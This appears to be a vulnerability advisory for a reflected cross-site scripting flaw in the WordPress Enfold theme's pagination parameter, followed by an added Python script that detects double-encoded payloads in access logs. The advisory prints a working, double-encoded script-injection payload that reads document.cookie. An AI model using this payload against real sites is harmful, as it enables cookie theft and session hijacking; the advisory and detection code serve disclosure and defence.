## https://sploitus.com/exploit?id=WPEX-ID:A53E213F-6011-47F8-93E6-AA5AD30E857E
The issue appears when pagination is in use on a WordPress site with the Enfold theme active. When that happens, the “avia-element-paging” parameter appears in the URL:

https://[website]/paginated-entry/........&avia-element-paging=2

An attacker can add arbitrary text to the URL, and that text is reflected in the response. This is an XSS vulnerability that can be exploited by crafting a URL that links to a paginated entry:

https://[website]/paginated-entry/?ProofOfConcept

The "ProofOfConcept" text is reflected in the server's response, where it is included in the generated pagination buttons.

The attacker can exploit this issue by sending the following payload:

?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ%253D%253D%2522%2529%2529%253C%252Fscript%253E

which, after two rounds of URL decoding, becomes:

'><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>


and the Base64 payload decoded as:

console.log(document.cookie);
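
For detection, the point to take from the payload above is that it is percent-encoded twice, so a single decoding pass over the access log still shows no markup. The following is an added example, not part of the original advisory: it peels encoding layers from each request's query string and flags requests whose decoded form contains characters that can break out of an HTML attribute. The log lines are constructed, and the names `fully_decode`, `scan` and `MAX_ROUNDS` are assumptions of this sketch.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (clients, timestamps and sizes are made up).
# The second query string is the encoded payload quoted in the advisory above.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /paginated-entry/?avia-element-paging=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /paginated-entry/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ%253D%253D%2522%2529%2529%253C%252Fscript%253E HTTP/1.1" 200 5230',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /paginated-entry/?ProofOfConcept HTTP/1.1" 200 5125',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"""[<>"']""")  # characters that can close an attribute or tag
MAX_ROUNDS = 4  # assumption: upper bound on encoding layers to peel


def fully_decode(value, max_rounds=MAX_ROUNDS):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def scan(lines):
    """Return one finding per request whose decoded query string contains markup."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match or "?" not in match.group(1):
            continue
        query = match.group(1).split("?", 1)[1]
        decoded, rounds = fully_decode(query)
        if MARKUP.search(decoded):
            findings.append({"client": line.split()[0], "rounds": rounds, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit is a triage lead rather than proof of exploitation, since legitimate query strings can contain quotes; a `rounds` value of 2 or more is the stronger signal because ordinary browser navigation rarely produces nested encoding.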